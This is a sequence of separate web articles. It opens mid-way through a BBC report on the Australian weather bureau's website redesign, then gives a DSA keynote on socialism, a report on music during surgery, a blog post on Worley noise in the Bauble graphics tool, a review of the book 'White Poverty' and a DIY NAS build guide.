In a bid to calm the storm, parts of the previous site were brought back to life, giving people the option to use the old features.
A month after the relaunch, the new head of the Bom - who started his role during the saga - admitted the changes had been "challenging for some" and again apologised for the confusion.
"Inherently, we don't, and won't, always get it perfectly right. But, we are constantly striving to get better," Dr Stuart Minchin said.
But he kicked off another round of criticism by revealing the revamp actually cost $96m, a figure which covered a full website rebuild and testing of the "systems and technology that underpin" it.
Immediately, the government demanded Bom explain how taxpayers' money had been spent "efficiently and appropriately," according to the Sydney Morning Herald.
Barnaby Joyce, a member of the Nationals, which mainly represents regional communities, said: "We spent $96m to put a B at the end of the Bom site. It's now bomb, it's hopeless."
New site 'scrambling' people's brains
On the day of the launch, the Bom assured Australians that the community had been consulted on the changes. A test site in the months leading up to the relaunch found customer satisfaction rates were consistently above 70%, they told the BBC.
"The tsunami of complaints suggests that consultation was either perfunctory or they listened to the wrong people," Mr Pearson said.
For years, farmers and emergency workers had developed what neuroscientists call "procedural memory" for reading weather patterns using the site, he explained. It's muscle memory like touch-typing or driving a familiar route home.
"Your fingers know where the keys are, your hands know when to turn."
But when the new site changed the radar's colour scale, long-time users were left scratching their heads as their "hard-won intuition for reading storm intensity became unreliable overnight".
Steve Turton/Bom
The old colour scheme included black which users said was a useful indicator
The new site, Mr Pearson said, "was scrambling the neurological shortcuts that people had spent a decade building".
"It's like rearranging all the furniture in your house and then expecting you to navigate it in the dark without stubbing your toe. Except the 'furniture' in this case determines whether you move your livestock before the flood arrives."
For sociologist Ash Watson, the collective reaction to the site reflected its special status in Australia.
"Australia has always been a large country of weather extremes, and Bom's cultural importance has really been cemented in recent years as we've experienced more severe weather and the rising impacts of climate change."
As a regular user of Bom's site, Ms Watson acknowledged the good intentions behind the changes, but said her research - on the social impact of tech - showed that people are getting fatigued by change.
"It can be hard for people to get excited by new updates and see their immediate benefits when they don't want to have to learn how to use yet another new platform, app or website."
AFP via Getty Images
The Bom website performs an essential role in times of disaster
This is not the first time the Bom has weathered a publicity storm.
In 2022, it spent hundreds of thousands of dollars on a rebrand, asking to be called either its full name or "the bureau", not the "weather bureau" or "the Bom", given the negative connotations.
But the campaign was short-lived. They eventually released a statement saying the public was welcome to use whatever name they wished.
The incident reflected a fundamental misunderstanding of how the culture of naming works, Mr Pearson said.
Australians had organically adopted "Bom" as a term of affection, like a nickname for a friend, he said.
"When the institution tried to correct this, it felt like being told you're pronouncing your mate's name wrong."
He said the site's redesign revealed a similar "cultural blindness but with higher stakes".
In a statement, Bom's spokesperson told the BBC it had received about 400,000 items of feedback on the new site, which accounted for less than 1% of the 55 million visits in the past month.
The responses were "both positive and negative", they said, with fans saying they liked the new design and presentation, the accuracy and reliability of the forecasts, and greater ease in using the site on different types of mobile devices.
But it was clear that people had "formed strong habits", the spokesperson said, and further changes may be made based on the feedback.
The Goal of Socialism Is Everything
Portside
portside.org
2025-11-27 05:01:47
On Saturday, November 22, Jacobin founding editor Bhaskar Sunkara delivered the keynote at New York City Democratic Socialists of America’s (DSA) biannual organizing conference at the First Unitarian Congregational Society in Brooklyn. Below is a transcript of his remarks on why the Left must win real gains today — but also keep fighting for a socialist society beyond them.
I'm so excited to be here with you all. It feels to me that this is the political moment so many of us have been waiting for and working to build for years.
We’re a month away from one of our comrades becoming mayor. We’ve built a network of socialist elected officials, we have a real organization to call home, and there’s a growing base of support in this city for our immediate demand of taxing the rich to expand public goods.
This moment extends beyond New York — we have a huge political opening in the United States as whole. But we know that we have that opportunity because millions of people are living through hard times. We have an erratic and authoritarian president, we have an affordability crisis, with millions struggling to pay their bills and to live lives where they’re treated with dignity and respect. We’ve seen the return of forms of nativism and racism that should have been long vanquished by now.
And at a social and economic level, things may get worse very soon.
The country — not just this city — is crying out for principled political leadership. Not just a kind of populist leadership through great figures, though I’m grateful we have one of the greatest figures on our side. I mean class leadership through organization.
The leadership that says that the disparities that we see in our country and the world are not the natural laws of God but the result of a world that human beings have created. The leadership that says that the interests of the working-class majority are distinct from the interest of capitalist elites, and that we need to organize around those interests to win not only a better distribution of wealth within capitalism but a different type of society altogether.
God’s Children Can Govern
I joined the Democratic Socialists of America when I was seventeen years old. I don’t need to tell you what DSA was in New York back in 2007. Some of you here remember it. I made so many good friends, but we were lucky if a dozen people showed up to a meeting.
We made progress through the patient, steady work and commitment of those people and the many more who joined later. We were marathon runners for socialism.
This, though, is a moment for sprinting. This is the biggest opening our movement has had in decades. The time we devote to political work in the next few months and years will have an outsize impact in our city and country — for now and for posterity.
But what exactly should we be doing, and how should we relate to both the new mayor’s administration and our other comrades in elected office? In my mind, our tasks as organized socialists outside of government are both different and largely compatible with theirs.
The key demands of our moment are around the affordability agenda. Our mayor-elect will be leading an effort to raise revenue to fund social programs and empower the city’s working class. If Zohran, our other electeds, and the grassroots movement around them deliver positive change in people’s lives, we’ll build a deeper social base for the Left.
Right now, our electoral strength has far outpaced our base. But people are ready for our message and ready for results.
But fundamentally, there are constraints to any sort of social democratic governance. Just as under capitalism, workers are dependent on having profitable firms for jobs. Cities are dependent on big corporations and wealthy people for tax revenue.
Zohran needs to navigate these constraints. He can’t undermine the old regime of accumulation and redistribution without having a replacement for it, and certainly there can’t be a total replacement in one city.
These concerns aren’t new. This is the dilemma of social democracy. This is the tension between our near-term and long-term goals that has existed in the socialist movement for 150 years.
Our elected officials in the near term need to manage capitalism in the interest of workers, while our movement also has a long-term goal of constructing a new system through the self-emancipation of those workers.
We need to see the constraints that Zohran will be under in these structural terms, rather than moral ones. But having patience and being supportive of him doesn’t answer how we reconcile the near and the long — social democracy and socialism.
At the very least, it’s important that we remember the end goal. The great theorist of reformism, Eduard Bernstein, once said that “the goal is nothing, the movement everything.” I think that’s not quite right. If we don’t talk about socialism after capitalism, no one else will. The historic dream of our movement, a world without exploitation or oppression, will be lost.
But we shouldn’t just avoid reformism because we want to feel pure as “true socialists” or as an intellectual pursuit. We should avoid reformism and remember the goal of rupture with capitalism because it can offer a compelling vision of the world to those we’re trying to reach.
Socialism isn’t “Sweden” like Bernie sometimes says. Socialism isn’t even just, as Martin Luther King Jr said and Zohran has beautifully invoked, “a better distribution of wealth for all of God’s children.”
Socialism means a better distribution but also democratic control over the things we all depend on — workers holding the levers of production and investment, and the state guaranteeing the basics of life as social rights.
Socialism means no longer begging corporations to invest in our communities or the rich to stay and pay their taxes.
Socialism means overcoming the labor-capital dialectic through the triumph of labor itself, not a more favorable class compromise.
Socialism means that the people who’ve kept this world alive — the caregivers, the drivers, the machinists, the farmworkers, the cleaners — stop being an invisible backdrop and become the authors of their futures.
Socialism means a society where those who have always given without having any say finally show their true capabilities. Where, as C. L. R. James said, every cook can govern.
Socialism means replacing an economy built on hierarchy and exclusion with one built on the intelligence and creativity of working people themselves.
That is the goal we keep alive. Not because it’s utopian, but because it is the only horizon equal to the dignity and potential of ordinary people.
And because it’s compelling. This isn’t just offering workers some of their surplus value back in exchange for their votes. It’s offering them the future, a society that they can own, a chance to assume their rightful place as agents of history.
Something like this is real socialism. It isn’t an interest group or a label to distinguish ourselves from other progressives. It’s a fundamentally more radical goal than those of our allies. It’s premised on a different analysis of the world around us and the world that can be built.
Perhaps we can think of ways to bridge some of the gap between near and long through a set of demands that at least raise the concept of socialization immediately. Ideas that offer not just more badly needed social welfare but a taste of ownership and control. A hint at a different political economy.
Just one example: when a business closes down or its owners are retiring, workers supported by a public fund could get the first crack at saving it by converting it into a labor-managed firm. At the city level, we can have a municipal office to help workers turn shuttered shops into cooperatives by providing the backbone of legal and accounting support and fast-tracking permits.
We’ve already been talking about city-owned grocery stores and the need for public housing. We need more ideas like these. Reforms that fit within social democracy but gesture beyond it.
Socialism in Our Time
It’s been thrilling to meet people who’ve just joined DSA. It’s been nice to see old friends too. I’ve been complaining about missing the first half of the Knicks game, but even Jalen Brunson can’t keep me away from here.
I’m really enthusiastic about what we can do in the next couple of years. We will improve the lives of millions of people. And we will grow our movement.
But in addition to enthusiasm, we need honesty about how far we still have to go to root ourselves in working-class communities. We need more power not just at the ballot box but at the points of production and exchange. And we need to be honest about the battles and constraints that Zohran will face, and be ready to support him when times get tough.
Zohran’s mayoralty will be a fight for what’s winnable right now. Our job is to let that fight expand, not narrow, our horizon — and to keep alive the goal of socialism in our time.
Bhaskar Sunkara is the founding editor of Jacobin, the president of the Nation magazine, and the author of The Socialist Manifesto: The Case for Radical Politics in an Era of Extreme Inequality.
Music eases surgery and speeds recovery, study finds
Music eases surgery and speeds recovery, Indian study finds
Soutik Biswas
India correspondent
BBC
A patient with headphones playing music during surgery in a hospital in Delhi
Under the harsh lights of an operating theatre in the Indian capital, Delhi, a woman lies motionless as surgeons prepare to remove her gallbladder.
She is under general anaesthesia: unconscious, insensate and rendered completely still by a blend of drugs that induce deep sleep, block memory, blunt pain and temporarily paralyse her muscles.
Yet, amid the hum of monitors and the steady rhythm of the surgical team, a gentle stream of flute music plays through the headphones placed over her ears.
Even as the drugs silence much of her brain, its auditory pathway remains partly active. When she wakes up, she will regain consciousness more quickly and clearly because she required lower doses of anaesthetic drugs such as propofol and opioid painkillers than patients who heard no music.
That, at least, is what a new peer-reviewed study from Delhi's Maulana Azad Medical College and Lok Nayak Hospital suggests. The research, published in the journal Music and Medicine, offers some of the strongest evidence yet that music played during general anaesthesia can modestly but meaningfully reduce drug requirements and improve recovery.
The study focuses on patients undergoing laparoscopic cholecystectomy, the standard keyhole operation to remove the gallbladder. The procedure is short - usually under an hour - and demands a particularly swift, "clear-headed" recovery.
To understand why the researchers turned to music, it helps to decode the modern practice of anaesthesia.
"Our aim is early discharge after surgery," says Dr Farah Husain, senior specialist in anaesthesia and certified music therapist for the study. "Patients need to wake up clear-headed, alert and oriented, and ideally pain-free. With better pain management, the stress response is curtailed."
Achieving that requires a carefully balanced mix of five or six drugs that together keep the patient asleep, block pain, prevent memory of the surgery and relax the muscles.
Getty Images
Patients need to wake up clear-headed and ideally pain-free after surgery
In procedures like laparoscopic gallbladder removal, anaesthesiologists now often supplement this drug regimen with regional "blocks" - ultrasound-guided injections that numb nerves in the abdominal wall.
"General anaesthesia plus blocks is the norm," says Dr Tanvi Goel, primary investigator and a former senior resident of Maulana Azad Medical College. "We've been doing this for decades."
But the body does not take to surgery easily. Even under anaesthesia, it reacts: heart rate rises, hormones surge, blood pressure spikes. Reducing and managing this cascade is one of the central goals of modern surgical care. Dr Husain explains that the stress response can slow recovery and worsen inflammation, highlighting why careful management is so important.
The stress starts even before the first cut, with intubation - the insertion of a breathing tube into the windpipe.
To do this, the anaesthesiologist uses a laryngoscope to lift the tongue and soft tissues at the base of the throat, obtain a clear view of the vocal cords, and guide the tube into the trachea. It's a routine step in general anaesthesia that keeps the airway open and allows precise control of the patient's breathing while they are unconscious.
"The laryngoscopy and intubation are considered the most stressful response during general anaesthesia," says Dr Sonia Wadhawan, director-professor of anaesthesia and intensive care at Maulana Azad Medical College and supervisor of the study.
"Although the patient is unconscious and will remember nothing, their body still reacts to the stress with changes in heart rate, blood pressure, and stress hormones."
To be sure, the drugs have evolved. The old ether masks have vanished. In their place are intravenous agents - most notably propofol, the hypnotic made infamous by Michael Jackson's death but prized in operating theatres for its rapid onset and clean recovery. "Propofol acts within about 12 seconds," notes Dr Goel. "We prefer it for short surgeries like laparoscopic cholecystectomy because it avoids the 'hangover' caused by inhalational gases."
The team of researchers wanted to know whether music could reduce how much propofol and fentanyl (an opioid painkiller) patients required. Fewer drugs mean faster awakening, steadier vital signs and reduced side effects.
So they designed a study. A pilot involving eight patients led to a full 11-month trial of 56 adults, aged roughly 20 to 45, randomly assigned to two groups. All received the same five-drug regimen: a drug that prevents nausea and vomiting, a sedative, fentanyl, propofol and a muscle relaxant. Both groups wore noise-cancelling headphones - but only one heard music.
"We asked patients to select from two calming instrumental pieces - soft flute or piano," says Dr Husain. "The unconscious mind still has areas that remain active. Even if the music isn't explicitly recalled, implicit awareness can lead to beneficial effects."
A pilot involving eight patients led to a full trial of 56 adults randomly assigned to two groups
The results were striking.
Patients exposed to music required lower doses of propofol and fentanyl. They experienced smoother recoveries, lower levels of cortisol, the stress hormone, and much better control of blood pressure during the surgery. "Since the ability to hear remains intact under anaesthesia," the researchers write, "music can still shape the brain's internal state."
Clearly, music seemed to quieten the internal storm. "The auditory pathway remains active even when you're unconscious," says Dr Wadhawan. "You may not remember the music, but the brain registers it."
The idea that the mind behind the anaesthetic veil is not entirely silent has long intrigued scientists. Rare cases of "intraoperative awareness" show patients recalling fragments of operating-room conversation.
If the brain is capable of picking up and remembering stressful experiences during surgery - even when a patient is unconscious - then it might also be able to register positive or comforting experiences, like music, even without conscious memory.
"We're only beginning to explore how the unconscious mind responds to non-pharmacological interventions like music," says Dr Husain. "It's a way of humanising the operating room."
Music therapy is not new to medicine; it has long been used in psychiatry, stroke rehabilitation and palliative care. But its entry into the intensely technical, machine-governed world of anaesthesia marks a quiet shift.
If such a simple intervention can reduce drug use and speed recovery - even modestly - it could reshape how hospitals think about surgical wellbeing.
As the research team prepares its next study exploring music-aided sedation, building on earlier findings, one truth is already humming through the data: even when the body is still and the mind asleep, it appears a few gentle notes can help the healing begin.
Worley noise is a type of noise used for procedural texturing in computer graphics. In its most basic form, it looks like this:
(color r2 (worley q 50 :oversample true))
That’s ugly and boring, but it’s a quick way to see what the effect looks like. If we use Worley noise to distort a 3D shape, we can get something like a hammered or cratered texture:
(def s (osc t 5 | ss 0.2 0.8 * 30 + 10))
(ball 100
| expound (worley p s) (sqrt s)
| slow 0.8
| shade sky
| rotate y (t / 10))
Like many procedural textures, it looks a lot better if you repeat the effect a few times with different frequencies:
(def s (osc t 5 | ss 0.2 0.8 * 30 + 10))
(ball 100
| expound (fbm 3 worley p s) (sqrt s)
| slow 0.8
| shade sky
| rotate y (t / 10))
There are some visual artifacts in these renderings, because they’re using a fast approximation of Worley noise that gives the wrong answer for some values.
To explain these artifacts in more detail, we have to understand a little bit about how Worley noise works.
It’s pretty simple: you start with a grid of points.
When you're writing a shader, you don't actually have the ability to generate random numbers, so we're using a hash function to produce random-looking offsets based on the logical position of each point (that is, $i = [0 0] for the center point, $i = [1 0] for the point to the right of that, etc).
Finally, once you have the points at random-looking positions, you compute the distance to the nearest point for every single pixel that you sample – and that's Worley noise.
How do you compute the distance to the nearest point for any pixel you ask about? It's actually pretty simple: you know that you started with a perfectly even square grid. For any pixel, you can compute the "grid cell" that that pixel falls into ([0 0], [0 1], etc). It's just the pixel divided by the grid size, rounded to the nearest integer.
And you know that the nearest point is either in this grid, or it's in one of the immediately adjacent grids, because we only offset our points by at most half the grid size, so each randomly distributed point is still inside its original grid cell. Which means there's no point inside any other cell that could be nearer than any point in one of the adjacent cells.
So that leaves you nine points to check, for every single pixel in your shader. Here's the optimization that's causing visual artifacts: instead of checking all nine adjacent cells, only check the current cell and the three cells closest to the point in question. The nearest point to your sample position is probably in one of those cells, but it doesn't have to be. So you might get some visual artifacts occasionally.
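To make that concrete, here is a rough Python sketch of the procedure just described, with a flag to switch between the exact nine-cell search and the four-cell shortcut. This is an illustration only, not Bauble's implementation; the hash constants and function names are invented.

import math

def cell_offset(ix, iy):
    # Hash an integer cell coordinate to a deterministic jitter in [-0.5, 0.5).
    # Stand-in for a shader hash; the constants are arbitrary bit-scramblers,
    # not taken from Bauble.
    def h(a, b):
        s = math.sin(ix * a + iy * b) * 43758.5453
        return (s - math.floor(s)) - 0.5
    return h(127.1, 311.7), h(269.5, 183.3)

def worley(x, y, grid_size=50.0, full_search=True):
    # Distance from sample (x, y) to the nearest jittered grid point.
    # full_search=True checks the full 3x3 neighborhood (exact).
    # full_search=False checks only the current cell plus the three cells the
    # sample leans toward -- the fast approximation that can miss the true
    # nearest point.
    qx, qy = x / grid_size, y / grid_size
    cx, cy = math.floor(qx), math.floor(qy)
    fx, fy = qx - cx, qy - cy

    if full_search:
        neighborhood = [(dx, dy) for dx in (-1, 0, 1) for dy in (-1, 0, 1)]
    else:
        sx = -1 if fx < 0.5 else 1
        sy = -1 if fy < 0.5 else 1
        neighborhood = [(0, 0), (sx, 0), (0, sy), (sx, sy)]

    best = float("inf")
    for dx, dy in neighborhood:
        ix, iy = cx + dx, cy + dy
        ox, oy = cell_offset(ix, iy)
        # Feature point: the cell's center, offset by at most half a cell.
        px = (ix + 0.5 + ox) * grid_size
        py = (iy + 0.5 + oy) * grid_size
        best = min(best, math.hypot(x - px, y - py))
    return best

With full_search=False you get exactly the failure mode described above: whenever the true nearest feature point happens to sit in one of the five skipped cells, the returned distance is too large, which shows up as the occasional visual artifact in the renders.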
Nowhere does the equivalent Bauble code compute cell coordinates or check for the nearest point. I just constructed this thing, said shape/distance, and somehow that just… gave me the distance to the nearest point.
I was able to do that because Bauble is a playground for making 3D graphics with signed distance functions. Bauble's whole deal is computing distances to things! And Worley noise is just the signed distance function of a bunch of randomly distributed points. I'm used to thinking of signed distance functions as defining implicit surfaces of 3D shapes, but Worley noise uses the distance as a scalar in its own right.
So.
This is interesting.
What if… we took other signed distance functions, and used them as procedural noise distortions?
We’ll start simple. Instead of points, what if we randomly distribute a bunch of squares?
It’s a lot harder to visualize the distance field in 3D. What you’re seeing there is the distance field at the plane that passes through the origin and faces towards the camera. I know it’s not a great visualization, but the point is that this technique generalizes to 3D (even if it’s hard to imagine the distance field at every point in 3D space).
Let’s see how this looks when we use it to distort a 3D shape:
I think it’s kind of more interesting without the randomization.
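In the same Python terms as the earlier Worley sketch, the un-randomized version is just a box SDF tiled across the grid; the grid size and square size here are made-up values:

```python
import math

def box_sdf(px, py, half):
    """Signed distance from (px, py) to an axis-aligned square of
    half-width `half` centered at the origin (negative inside)."""
    dx, dy = abs(px) - half, abs(py) - half
    outside = math.hypot(max(dx, 0.0), max(dy, 0.0))
    inside = min(max(dx, dy), 0.0)
    return outside + inside

def square_grid_noise(x, y, grid_size=50.0, half=12.0):
    """A Worley-style noise built from a different SDF: the signed
    distance to the nearest square on a regular, un-jittered grid."""
    # Fold the sample into the cell of the nearest lattice point and
    # evaluate the square's SDF there; tiling the SDF is the whole trick.
    lx = x - round(x / grid_size) * grid_size
    ly = y - round(y / grid_size) * grid_size
    return box_sdf(lx, ly, half)
```

Adding a per-cell jitter, as in the Worley sketch above, brings back the randomized version at the cost of checking the 3x3 neighborhood again.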
We’ve constructed an interesting 3D noise function, and we’re using it to distort 3D space. But of course, we can go back to considering this a “noise texture” in the original sense of the word:
The point of all of this is: Worley noise invites us to reconsider signed distance functions as more than implicit surfaces. And since Bauble makes it easy to construct signed distance functions, it’s a good playground for experimenting with textures like this.
Even if we never found anything particularly attractive, it’s fun to play around with space.
If this is your first time seeing Bauble, hey welcome! This post is an expansion of something I briefly talked about in a YouTube video once. The video has many more examples of the sorts of things that Bauble can do. Check it out if this piqued your interest!
White Poverty
How Exposing Myths About Race and Class Can Reconstruct American Democracy
Liveright
William J. Barber II with Jonathan Wilson-Hartgrove
ISBN: 978-1-324-09675-7
For
progressives
to win, we need a powerful multiracial coalition. That includes the people of color who disproportionately suffer
poverty
and structural violence, but it also includes the white people who make up the largest share of poor people in this country.
As the Reverend Dr.
William J. Barber
II points out in his new book,
White Poverty
, there are more poor white people than any other racial group, and more effort should be put into pulling them into this coalition.
I’m a white man from a wealthy family—and a lawyer who took on tough
civil rights
cases and fought them as if my life depended on it. My goal from the beginning was to join those who are trying to make America a better place—a country where
racism
and sexism would slowly fade away and where the possibility of equal opportunity would shine through.
I see that road forward in Rev. Barber’s new book, co-written with Jonathan Wilson-Hartgrove.
Talking to white people in all walks of life—from taxi drivers to restaurant workers as well as bankers and stockbrokers—has been very revealing. When I say I’m a civil rights lawyer, their voices often take on a certain unsympathetic tone—and many times they inject the “Black crime rate” into the conversation. Sometimes the person will shift the conversation to discuss Black children being raised by single women who use food stamps to put food on the table or who benefit from other welfare programs.
As Barber points out, there are “more than twice as many poor white people as there are poor Black people in this nation.” But if I mention that, the person sometimes appears not to hear me, or lets me know in no uncertain terms that it’s Black people themselves who are at fault for their poverty—and they should look to their own lives rather than blame whites. The government taxes “us,” I’m often told, to give “them” a free ride.
When I hear this, I know there’s something major missing.
De-racializing Poverty
I’ve been encouraged by the many articles, books, and memoirs that have been written about
racial justice
since the protests over George Floyd’s murder, but few suggest an effective way forward.
For example, a new book by Kellie Carter Jackson,
We Refuse: A Forceful History of Black Resistance
(Seal Press, 2024), highlights how Black women fought back against racism, some with weapons, some without, but none took the path that Reverend Barber takes in
White Poverty
. Reverend Barber, by contrast, argues that Blacks and whites must join together to address their common needs.
Another prominent civil rights advocate, Heather McGhee, traveled across America to write
The Sum of Us: What Racism Costs Everyone and How We Can Prosper Together
(One World, 2021), which documents how some progressives were beginning to engage in cross-racial solidarity through collective action to achieve higher wages and benefits for working people.
In effect, Barber’s
White Poverty
builds upon McGhee’s book. It’s the work of a man of action to not only test cross-racial solidarity, but to put that theory into action. Barber lays it on the line in his very first sentence: “This is a book by a Black man about white poverty in America.” That initial signal points to where he is headed.
As a lifelong civil rights lawyer, I find that his signal resonates. As Barber persuasively argues, the public and the country’s legislatures—federal, state, and local—accept the myth that poverty is only a Black issue, as do the people I talk to daily. They view poverty through this lens to the detriment of Black and white people alike, as well as people of all other colors and races.
As Barber points out, the political establishment invariably markets itself to the needs of “the middle class” and ignores the poor, and whites especially look the other way. The same is true even in our country’s religious establishments. Barber notes that “a Pew Research Center study of nearly 50,000 sermons found that neither the words ‘poverty’ nor ‘poor’ register as commonly used in American pulpits.”
A Multiracial Fusion Movement
Much of
White Poverty
concerns the history of how American racism came into being and how the myths evolved around it. Barber explains how the manipulation of these myths has preserved the power of white elites, who use their political and economic power to downgrade the needs of poor white people as well as Black people, while benefiting the wealthy.
To this reader then,
White Poverty
‘s great value is to teach and motivate both Black and white leaders to create a multiracial movement which demands legislation that benefits
all
poor people. As an additional benefit,
White Poverty
gives examples of Black and white movements fusing themselves together.
Not least, Barber has spent a huge amount of energy over the past seven years in building a multiracial
Poor People’s Campaign
. Co-chaired by Rev. Barber along with Rev. Liz Theoharis of the Kairos Center, the Poor People’s Campaign has thousands in the field to help poor white and poor Black communities understand each others’ community needs and the advantages of working together to fight against “policy violence” and to turn out the vote.
In the last election for governor in
Kentucky
, the campaign and its allies worked with both white and Black rural communities to get out the vote. The result was an upset in electing the state’s present governor, Democrat Andy Beshear. In rural counties, an enlarged electorate turned out to vote and that tipped the election.
The Poor People’s Campaign has built durable alliances with other organizations to advance its multiracial vision. It’s currently collaborating with the AFL-CIO on voter engagement. It pursues legal challenges with Forward Justice. It coordinates actions with national Christian and Jewish organizations. With the Institute for Policy Studies, on whose board I serve, it has produced the data and the analysis to back up its bold agenda.
Barber is a man of the cloth who takes his religion seriously. As a result, the book is sprinkled with words from other religious figures who offer moral reasons for organizing poor people to struggle for their needs nonviolently, while being willing to cross police lines and stand up to authority.
In short, this beautifully written book offers a road map to the powerful multiracial organizing that can turn this country around, lift up poor people, and deepen our democracy.
Lewis M. Steel is a former senior counsel at Outten & Golden LLP and an Institute for Policy Studies board member. He is the author of The Butler’s Child: White Privilege, Race, and a Lawyer’s Life in Civil Rights.
Fourteen years ago, my storage needs outpaced my capacity and I began to look into building a network attached storage server. I had a few criteria in mind and was curious to see if anyone had recently shared something similar, but I couldn’t find anything that was relevant.
In fact, I found that the communities I was looking for answers in were actively hostile towards what I wanted to do. This resulted in my decision
to build my own DIY NAS
and share that as one of my very first blogs.
Much to my surprise, people were very interested in that blog! Ever since, I’ve been building a similar DIY NAS machine almost every year trying to satisfy the curiosity of other prospective DIY NAS builders.
Here are those criteria:
Small form factor
: It’s not the case for me any more, but at the time the space was limited in my office. I always assume that space in everybody’s office is limited. As a result, I want my DIY NAS builds to occupy as little of that office space as I can.
At least six drive bays
: Back when I built my NAS, it took about four drives’ worth of storage to meet my storage needs. Plus I desired two empty drive bays for future use. However, in the years since hard drive capacities have increased dramatically. At some point in the future, I may reduce this to four drive bays.
An integrated, low power CPU
: I intend my DIY NAS to run 24 hours a day, 7 days a week, and 52 weeks a year. When it comes to power consumption, that can do some damage to your electric bill! Thankfully, our electricity here isn’t as expensive as it is elsewhere in the United States, or beyond its borders, but I try to keep power consumption in mind when picking components for a DIY NAS build.
Homelab potential
: It does not take up a lot of CPU horsepower for a NAS to serve up files, which means that on modern hardware there’s a lot of untapped potential in a DIY NAS for virtual machines or containers to self-host services.
It’s important to remember that these are my criteria, and not necessarily yours. Every DIY NAS builder should make their own list of criteria and reconcile all of their component purchases against the criteria that are important to them.
Is it even a good time to build a NAS?
As I prepared to build this NAS, component prices disappointed me. Hard drives, SSDs, and RAM prices were all rising. Based on what I’ve been told, I expect Intel CPU prices to increase as well. My contact at Topton has been encouraging me to stock up on motherboards while they still have some in inventory. Based on what’s been explained to me, I expect motherboard prices to rise and availability to potentially dwindle.
In short, the economy sucks and the price of DIY NAS components is a pretty good reflection of just how sucky things are becoming. I briefly considered not publishing a DIY NAS build this year hoping that things would improve a few months down the road. But then I asked myself, “What if it’s even worse in a few months?”
I sure hope things get better, but I fear and expect that they’ll get worse.
Motherboard and CPU
I built
my first DIY NAS with a Topton motherboard in 2023
. Each DIY NAS since then has also featured a Topton motherboard. My only complaint about the motherboards has been that buying them from one of the Chinese e-tail sites like AliExpress is considered problematic by some. With every DIY NAS build, I try and go through all the motherboards that I can find while searching for something with a better value proposition, but for each of the past three years I’ve landed on the latest offering from Topton.
For the
DIY NAS: 2026 Edition
, I chose the
Topton N22 motherboard
with the
Intel Core 3 N355
CPU. The motherboard is similar to last year’s
Topton N18
but has incrementally more compelling features, particularly the extra 2 SATA ports, the PCI-e x1 slot, and the N355 CPU!
I opted for the motherboard with the
Intel Core 3 N355
CPU. This makes the server a more capable homelab machine than prior years’ DIY NAS builds. The extra cores and threads come in handy for streaming media, replacing your cloud storage, facilitating home automation, hosting game servers, etc.
Case
Just like Topton has been making great motherboards for DIY NAS machines, JONSBO has been steadily releasing great cases for them. This year SilverStone Technology released a new case, the CS383 (specs), which I was very interested in buying for the DIY NAS: 2026 Edition. Unfortunately, it carries a pretty hefty price tag to go along with all of its incredible features!
The
JONSBO N4
(
specs
) is a third the price, adheres to my “smaller footprint” criteria, and it is rather impressive on its own. It’s a
tiny
bit larger case than last year’s DIY NAS, but I really like that it has drive bays for six 3.5” drives and two 2.5” drives.
It is peculiar, though, in that two of the 3.5” drive bays (and the two 2.5” drive bays) aren’t attached to a SATA backplane and can’t be swapped anywhere near as easily as the other four 3.5” bays. However, this peculiar decision seems to be why the JONSBO N4 sells for a bit less ($20-$40) than similar offerings from JONSBO. At its price, it’s a compelling value proposition!
Case Fan
In the past, I’ve found that the fans which come with JONSBO cases are too noisy, for two reasons: the design quality of the fans makes them loud, and the fans constantly run at their top speed because of the fan header they’re plugged into on the cases’ SATA backplanes.
I anticipated that fan efficiency and noise would be a problem, so I picked out the
Noctua NF-A12x25 PWM
to solve it. Firstly, swapping in a high-quality fan that pushes more air
and
generates less noise–especially at its top speed–is a good first step. Secondly, I’d address the problem by plugging the fan into the motherboard’s SYS_FAN header instead of the one on the SATA backplane. This provides the opportunity to tune the fan’s RPMs directly in the BIOS and generate far less noise.
RAM
The first time I asked myself, “Should I even build the
DIY NAS: 2026 Edition
?” came as I was checking prices on DDR5 memory. Thankfully for me I had leftover RAM after purchasing DDR5 4800MHz SODIMMs for the
DIY NAS: 2025 Edition
,
the Pocket Mini NAS
, and then again for the
DIY NAS that I built and gave away at 2025’s Texas Linux Fest
. I was personally thankful that I had one brand-new 32GB DDR5 4800MHz SODIMM lying around, but when I saw the current price of those same SODIMMs, I was wildly disappointed for everybody who will try to follow this build.
Regardless, I felt a
Crucial 32GB DDR5 4800MHz SODIMM
(
specs
) was the right amount of RAM to get started with for a DIY NAS build in 2025. Whether you just need storage or you wish to also host virtual machines, you will benefit from having more than the bare minimum recommendation of RAM. I really wanted to buy a
48GB DDR5 4800MHZ SODIMM
for this DIY NAS build, but I couldn’t talk myself into spending the $250-$300 that it would’ve wound up costing.
Storage
A quick disclaimer about all the drives that I purchased for the
DIY NAS: 2026 Edition
, I already had all of them! I tend to buy things when I see them on sale and as a result, I have a collection of brand new parts for machines in my homelab or for upcoming projects. I raided that collection of spare parts for the
DIY NAS: 2026 Edition
.
Boot Drive
If you ranked the drives in your DIY NAS in order of importance, the boot drive should be the least-important drive. That is not to say that the boot drive isn’t performing an important function, but I am suggesting that you shouldn’t invest a bunch of energy and money into picking the optimal boot drive.
Because the
JONSBO N4
has a pair of 2.5” drive bays, I decided that a 2.5” SATA SSD would be ideal for the boot drives. As a rule of thumb, I try and spend less than $30 per boot drive in my DIY NAS builds.
Ultimately I selected a pair of
128GB Silicon Power A55 SSDs
(
specs
). I’ve used these before, I’d use them again in the future, and I even have four of their higher capacity (1TB) SSDs in a pool in my own NAS.
App and Virtual Machine NVMe SSDs
Self-hosting apps and virtual machines on your DIY NAS has really exploded in the past few years. The developers of NAS appliance packages have made it much easier, and the self-hosted products themselves have become as good as–or often better than–the services you’re probably subscribing to today. Because of that, I saved the highest-performing storage options on the
Topton N22 motherboard
for apps and VMs.
However, it’s important to point out that these M.2 slots are PCI-e version 3 and capped at a single PCI-e lane. This is a consequence of the limited number of PCI-e lanes available for each of the CPU options available for the
Topton N22 motherboard
(N100, N150, N305, and N355).
Thanks to rising prices, I opted to do like I’ve done with past DIY NAS builds and skip buying hard drives for the
DIY NAS: 2026 Edition
.
When planning your DIY NAS, it is good to always remember that
storage will ultimately be your costliest and most important expense
.
Here’s a few things to consider when buying hard drives:
Determine your hardware redundancy preferences. I recommend having two hard disk drives’ worth of redundancy (RAIDZ2, RAID6, etc.)
Focus on price-per-terabyte when comparing prices of drives; a quick worked example follows this list.
Do some
burn in testing
of your hard drives before putting them to use.
When buying new drives of the same model, try and buy them from multiple vendors to increase the chances of buying drives manufactured in separate batches.
